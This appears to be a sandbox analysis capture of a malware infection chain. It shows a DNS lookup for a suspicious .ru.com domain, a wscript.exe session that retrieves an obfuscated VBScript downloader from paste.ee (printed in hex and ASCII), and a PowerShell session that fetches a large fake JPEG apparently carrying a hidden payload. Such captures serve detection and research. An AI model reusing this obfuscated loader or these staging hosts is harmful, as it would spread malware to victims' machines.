Apr 30, 2024 07:59:48.491219044 CEST	1.1.1.1	192.168.2.7	0x1014	No error (0)	bomdokasw.ru.com		66.90.95.11	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

bomdokasw.ru.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49706	104.21.84.67	443	6552	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:59:32 UTC	319	OUT	GET /d/thAhY HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
2024-04-30 05:59:32 UTC	1238	IN	HTTP/1.1 200 OK Date: Tue, 30 Apr 2024 05:59:32 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMib3WDKvGVVZUJZNmldA1rWP9pMjI76PujL1%2BSzQjAeG%2B%2FZmlfmCeMPOzQpRLlRlABjuaHzWtok8hxJr5mMKdkv2f7KpzrDq32J0wdVr%2BRggiDi3WAFB7x%2Ffg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87c54e6d4eee1140-ORD alt-svc: h3=":443"; ma=86400
2024-04-30 05:59:32 UTC	131	IN	Data Raw: 33 33 62 61 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 65 6e 63 61 76 61 6c 67 61 72 20 2c 20 61 6e 74 65 63 65 73 73 6f 72 20 2c 20 72 65 6d 65 6c 67 75 65 69 72 6f 20 2c 20 70 69 63 61 72 64 6f 20 2c 20 6d 6f 72 73 61 20 2c 20 43 61 6d 61 20 2c 20 6d 6f 72 73 61 31 0d 0a 20 20 20 20 20 61 6e 74 65 63 65 73 73 6f 72 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 72 65 6d 65 6c 67 75 65 69 72 6f 20 Data Ascii: 33ba dim encavalgar , antecessor , remelgueiro , picardo , morsa , Cama , morsa1 antecessor = " " remelgueiro
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 20 3d 20 22 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 Data Ascii: = "" & picardo & antecessor & picardo & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQ
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 51 42 68 Data Ascii: reG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & picardo & antecessor & picardo & "gBvDgTreHIDgTre" & picardo & antecessor & picardo & "QBh
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 67 54 72 65 63 67 44 67 54 72 65 76 44 67 54 72 65 47 6b 44 67 54 72 Data Ascii: redDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & picardo & antecessor & picardo & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & picardo & antecessor & picardo & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTr
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 65 44 67 54 72 65 34 44 67 54 72 65 44 49 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 6b 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 Data Ascii: eDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & picardo & antecessor & picardo & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTr
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 52 67 42 73 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 77 44 67 54 72 65 50 44 67 54 72 65 42 43 44 67 54 72 65 45 45 44 67 54 72 65 55 77 42 46 44 67 54 Data Ascii: QDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & picardo & antecessor & picardo & "QBuDgTreGQDgTreRgBsDgTreGEDgTre" & picardo & antecessor & picardo & "wDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgT
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 Data Ascii: DgTreG4DgTre" & picardo & antecessor & picardo & "DgTreDgTregDgTreCQDgTre" & picardo & antecessor & picardo & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & picardo & antecessor & picardo & "QB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHID
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 77 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 63 44 67 54 72 65 64 44 67 54 72 65 42 6f 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 Data Ascii: gTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & picardo & antecessor & picardo & "QB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTre" & picardo & antecessor & picardo & "QBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTr
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 70 69 63 61 72 64 6f 20 26 20 61 6e 74 65 63 65 73 73 6f 72 20 26 20 70 69 63 61 72 64 6f 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 55 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 51 44 67 54 72 65 46 49 44 67 54 72 65 54 77 42 4b 44 67 54 72 65 45 55 44 67 54 72 65 56 44 67 54 72 65 42 50 44 67 54 72 65 45 45 44 67 54 72 65 56 51 42 55 Data Ascii: e9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & picardo & antecessor & picardo & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBU
2024-04-30 05:59:32 UTC	1369	IN	Data Raw: 6b 44 67 54 72 65 64 67 42 68 44 67 54 72 65 47 51 44 67 54 72 65 62 77 44 67 54 72 65 6e 44 67 54 72 65 43 77 44 67 54 72 65 4a 77 42 4e 44 67 54 72 65 46 4d 44 67 54 72 65 51 67 42 31 44 67 54 72 65 47 6b 44 67 54 72 65 62 44 67 54 72 65 42 6b 44 67 54 72 65 43 63 44 67 54 72 65 4c 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 43 63 44 67 54 72 65 4b 51 44 67 54 72 65 70 44 67 54 72 65 48 30 44 67 54 72 65 49 44 67 54 72 65 42 39 44 67 54 72 65 44 67 54 72 65 3d 3d 22 0d 0a 20 20 20 20 20 72 65 6d 65 6c 67 75 65 69 72 6f 20 3d 20 52 65 70 6c 61 63 65 28 20 72 65 6d 65 6c 67 75 65 69 72 6f 2c 20 70 69 63 61 72 64 6f 20 2b 20 61 6e 74 65 63 65 73 73 6f 72 20 2b 20 70 69 63 61 72 64 6f 20 2c 20 22 5a 22 29 0d 0a 20 20 20 20 20 53 65 74 20 43 61 6d 61 20 Data Ascii: kDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBNDgTreFMDgTreQgB1DgTreGkDgTrebDgTreBkDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==" remelgueiro = Replace( remelgueiro, picardo + antecessor + picardo , "Z") Set Cama

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	104.21.45.138	443	7664	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:59:35 UTC	124	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-04-30 05:59:35 UTC	699	IN	HTTP/1.1 200 OK Date: Tue, 30 Apr 2024 05:59:35 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 1248 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZ%2FzRwwSDkJC3wvtR7E4EJGWE8uZzp9RMruBQXNkEsy2TbmojUKwT6bL8IGwBHMrwIb1u9p4W8hKGhawHdMXgaE2yCwT9BRTRHhj%2BYQanlusI%2F%2Bmie4m7WOfDbbQ5yZ2ot3E1iVkbkyF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87c54e80de841251-ORD alt-svc: h3=":443"; ma=86400
2024-04-30 05:59:35 UTC	670	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-30 05:59:35 UTC	1369	IN	Data Raw: c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-30 05:59:35 UTC	1369	IN	Data Raw: c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$
2024-04-30 05:59:35 UTC	1369	IN	Data Raw: 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-04-30 05:59:35 UTC	1369	IN	Data Raw: 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
2024-04-30 05:59:35 UTC	1369	IN	Data Raw: cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-04-30 05:59:35 UTC	1369	IN	Data Raw: 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 Data Ascii: r:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
2024-04-30 05:59:35 UTC	1369	IN	Data Raw: dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
